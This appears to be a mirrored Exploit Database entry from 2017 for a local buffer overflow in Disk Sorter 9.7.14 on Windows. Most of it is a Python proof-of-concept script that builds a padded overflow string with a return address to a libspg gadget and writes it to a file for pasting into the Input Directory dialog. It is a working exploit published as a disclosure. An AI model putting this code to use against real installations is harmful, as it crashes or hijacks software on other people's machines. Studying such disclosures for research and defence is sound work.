Disk Sorter 9.7.14 – ‘Input Directory’ Local Buffer Overflow (PoC)

• Exploit Database
• 103 阅读

• 作者： n3ckD_
  日期： 2017-06-02
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42112/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  #!/usr/bin/python   ###################################### # Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC # Date: 25 May 2017 # Exploit Author: n3ckD_ # Vendor Homepage: http://www.disksorter.com/ # Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe # Version: Disk Sorter v9.7.14 (32-Bit) # Tested on: Windows 7 Enterprise SP1 (Build 7601) # Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog ######################################   print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC" print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"   # in libspg:.text # 10147C1C 58 POP EAX # 10147C1D C3 RETN ret = "\x1c\x7c\x14\x10"   nops = "\x47\x4F"*24 buf = nops + "A"*4048 + ret + "MAGIC" + "\n"   f = open("poc.txt","w") f.write(buf) f.close()